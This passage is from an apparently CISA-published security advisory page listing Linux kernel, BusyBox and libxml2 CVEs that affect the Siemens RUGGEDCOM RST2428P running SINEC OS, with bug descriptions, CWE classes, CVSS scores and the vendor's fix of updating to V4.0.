<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40262</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: Input: imx_sc_key - fix memory corruption on unload This is supposed to be "priv" but we accidentally pass "&amp;priv" which is an address in the stack and so it will lead to memory corruption when the imx_sc_key_action() function is called. Remove the &amp;.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40262">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40263</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: Input: cros_ec_keyb - fix an invalid memory access If cros_ec_keyb_register_matrix() isn't called (due to `buttons_switches_only`) in cros_ec_keyb_probe(), `ckdev-&gt;idev` remains NULL. An invalid memory access is observed in cros_ec_keyb_process() when receiving an EC_MKBP_EVENT_KEY_MATRIX event in cros_ec_keyb_work() in such case. Unable to handle kernel read from unreadable memory at virtual address 0000000000000028 ... x3 : 0000000000000000 x2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: input_event cros_ec_keyb_work blocking_notifier_call_chain ec_irq_thread It's still unknown about why the kernel receives such malformed event, in any cases, the kernel shouldn't access `ckdev-&gt;idev` and friends if the driver doesn't intend to initialize them.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40263">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40264</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: be2net: pass wrb_params in case of OS2BMC be_insert_vlan_in_pkt() is called with the wrb_params argument being NULL at be_send_pkt_to_bmc() call site.  This may lead to dereferencing a NULL pointer when processing a workaround for specific packet, as commit bc0c3405abbb ("be2net: fix a Tx stall bug caused by a specific ipv6 packet") states. The correct way would be to pass the wrb_params from be_xmit().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40264">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40271</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fs/proc: fix uaf in proc_readdir_de() Pde is erased from subdir rbtree through rb_erase(), but not set the node to EMPTY, which may result in uaf access. We should use RB_CLEAR_NODE() set the erased node to EMPTY, then pde_subdir_next() will return NULL to avoid uaf access. We found an uaf issue while using stress-ng testing, need to run testcase getdent and tun in the same time. The steps of the issue is as follows: 1) use getdent to traverse dir /proc/pid/net/dev_snmp6/, and current pde is tun3; 2) in the [time windows] unregister netdevice tun3 and tun2, and erase them from rbtree. erase tun3 first, and then erase tun2. the pde(tun2) will be released to slab; 3) continue to getdent process, then pde_subdir_next() will return pde(tun2) which is released, it will case uaf access. CPU 0 | CPU 1 ------------------------------------------------------------------------- traverse dir /proc/pid/net/dev_snmp6/ | unregister_netdevice(tun-&gt;dev) //tun3 tun2 sys_getdents64() | iterate_dir() | proc_readdir() | proc_readdir_de() | snmp6_unregister_dev() pde_get(de); | proc_remove() read_unlock(&amp;proc_subdir_lock); | remove_proc_subtree() | write_lock(&amp;proc_subdir_lock); [time window] | rb_erase(&amp;root-&gt;subdir_node, &amp;parent-&gt;subdir); | write_unlock(&amp;proc_subdir_lock); read_lock(&amp;proc_subdir_lock); | next = pde_subdir_next(de); | pde_put(de); | de = next; //UAF | rbtree of dev_snmp6 | pde(tun3) / \ NULL pde(tun2)</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40271">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/625.html">CWE-625 Permissive Regular Expression</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40278</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak Fix a KMSAN kernel-infoleak detected by the syzbot . [net?] KMSAN: kernel-infoleak in __skb_datagram_iter In tcf_ife_dump(), the variable 'opt' was partially initialized using a designatied initializer. While the padding bytes are reamined uninitialized. nla_put() copies the entire structure into a netlink message, these uninitialized bytes leaked to userspace. Initialize the structure with memset before assigning its fields to ensure all members and padding are cleared prior to beign copied. This change silences the KMSAN report and prevents potential information leaks from the kernel memory. This fix has been tested and validated by syzbot. This patch closes the bug reported at the following syzkaller link and ensures no infoleak.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40278">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40280</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: tipc: Fix use-after-free in tipc_mon_reinit_self(). syzbot reported use-after-free of tipc_net(net)-&gt;monitors[] in tipc_mon_reinit_self(). [0] The array is protected by RTNL, but tipc_mon_reinit_self() iterates over it without RTNL. tipc_mon_reinit_self() is called from tipc_net_finalize(), which is always under RTNL except for tipc_net_finalize_work(). Let's hold RTNL in tipc_net_finalize_work(). [0]: BUG: KASAN: slab-use-after-free in __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] BUG: KASAN: slab-use-after-free in _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162 Read of size 1 at addr ffff88805eae1030 by task kworker/0:7/5989 CPU: 0 UID: 0 PID: 5989 Comm: kworker/0:7 Not tainted syzkaller #0 PREEMPT_{RT,(full)} Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025 Workqueue: events tipc_net_finalize_work Call Trace: dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 __kasan_check_byte+0x2a/0x40 mm/kasan/common.c:568 kasan_check_byte include/linux/kasan.h:399 [inline] lock_acquire+0x8d/0x360 kernel/locking/lockdep.c:5842 __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162 rtlock_slowlock kernel/locking/rtmutex.c:1894 [inline] rwbase_rtmutex_lock_state kernel/locking/spinlock_rt.c:160 [inline] rwbase_write_lock+0xd3/0x7e0 kernel/locking/rwbase_rt.c:244 rt_write_lock+0x76/0x110 kernel/locking/spinlock_rt.c:243 write_lock_bh include/linux/rwlock_rt.h:99 [inline] tipc_mon_reinit_self+0x79/0x430 net/tipc/monitor.c:718 tipc_net_finalize+0x115/0x190 net/tipc/net.c:140 process_one_work kernel/workqueue.c:3236 [inline] process_scheduled_works+0xade/0x17b0 kernel/workqueue.c:3319 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3400 kthread+0x70e/0x8a0 kernel/kthread.c:463 ret_from_fork+0x439/0x7d0 arch/x86/kernel/process.c:148 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Allocated by task 6089: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:388 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:405 kasan_kmalloc include/linux/kasan.h:260 [inline] __kmalloc_cache_noprof+0x1a8/0x320 mm/slub.c:4407 kmalloc_noprof include/linux/slab.h:905 [inline] kzalloc_noprof include/linux/slab.h:1039 [inline] tipc_mon_create+0xc3/0x4d0 net/tipc/monitor.c:657 tipc_enable_bearer net/tipc/bearer.c:357 [inline] __tipc_nl_bearer_enable+0xe16/0x13f0 net/tipc/bearer.c:1047 __tipc_nl_compat_doit net/tipc/netlink_compat.c:371 [inline] tipc_nl_compat_doit+0x3bc/0x5f0 net/tipc/netlink_compat.c:393 tipc_nl_compat_handle net/tipc/netlink_compat.c:-1 [inline] tipc_nl_compat_recv+0x83c/0xbe0 net/tipc/netlink_compat.c:1321 genl_family_rcv_msg_doit+0x215/0x300 net/netlink/genetlink.c:1115 genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0x60e/0x790 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x208/0x470 net/netlink/af_netlink.c:2552 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0x846/0xa10 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x805/0xb30 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg+0x21c/0x270 net/socket.c:729 ____sys_sendmsg+0x508/0x820 net/socket.c:2614 ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668 __sys_sendmsg net/socket.c:2700 [inline] __do_sys_sendmsg net/socket.c:2705 [inline] __se_sys_sendmsg net/socket.c:2703 [inline] __x64_sys_sendmsg+0x1a1/0x260 net/socket.c:2703 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/ ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40280">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40281</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: sctp: prevent possible shift-out-of-bounds in sctp_transport_update_rto syzbot reported a possible shift-out-of-bounds [1] Blamed commit added rto_alpha_max and rto_beta_max set to 1000. It is unclear if some sctp users are setting very large rto_alpha and/or rto_beta. In order to prevent user regression, perform the test at run time. Also add READ_ONCE() annotations as sysctl values can change under us. [1] UBSAN: shift-out-of-bounds in net/sctp/transport.c:509:41 shift exponent 64 is too large for 32-bit type 'unsigned int' CPU: 0 UID: 0 PID: 16704 Comm: syz.2.2320 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Call Trace: __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x16c/0x1f0 lib/dump_stack.c:120 ubsan_epilogue lib/ubsan.c:233 [inline] __ubsan_handle_shift_out_of_bounds+0x27f/0x420 lib/ubsan.c:494 sctp_transport_update_rto.cold+0x1c/0x34b net/sctp/transport.c:509 sctp_check_transmitted+0x11c4/0x1c30 net/sctp/outqueue.c:1502 sctp_outq_sack+0x4ef/0x1b20 net/sctp/outqueue.c:1338 sctp_cmd_process_sack net/sctp/sm_sideeffect.c:840 [inline] sctp_cmd_interpreter net/sctp/sm_sideeffect.c:1372 [inline]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40281">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1335.html">CWE-1335 Incorrect Bitwise Shift of Integer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40345</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: usb: storage: sddr55: Reject out-of-bound new_pba Discovered by Atuin - Automated Vulnerability Discovery Engine. new_pba comes from the status packet returned after each write. A bogus device could report values beyond the block count derived from info-&gt;capacity, letting the driver walk off the end of pba_to_lba[] and corrupt heap memory. Reject PBAs that exceed the computed block count and fail the transfer so we avoid touching out-of-range mapping entries.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40345">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.8</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-46394</a></h3>
<div class="csaf-accordion-content">
<p>In tar in BusyBox through 1.37.0, a TAR archive can have filenames hidden from a listing through the use of terminal escape sequences.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-46394">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/451.html">CWE-451 User Interface (UI) Misrepresentation of Critical Information</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.2</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-49794</a></h3>
<div class="csaf-accordion-content">
<p>A use-after-free vulnerability was found in libxml2. This issue occurs when parsing XPath elements under certain circumstances when the XML schematron has the schema elements. This flaw allows a malicious actor to craft a malicious XML document used as input for libxml, resulting in the program's crash using libxml or other possible undefined behaviors.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-49794">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.1</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-49795</a></h3>
<div class="csaf-accordion-content">
<p>A NULL pointer dereference vulnerability was found in libxml2 when processing XPath XML expressions. This flaw allows an attacker to craft a malicious XML input to libxml2, leading to a denial of service.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-49795">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
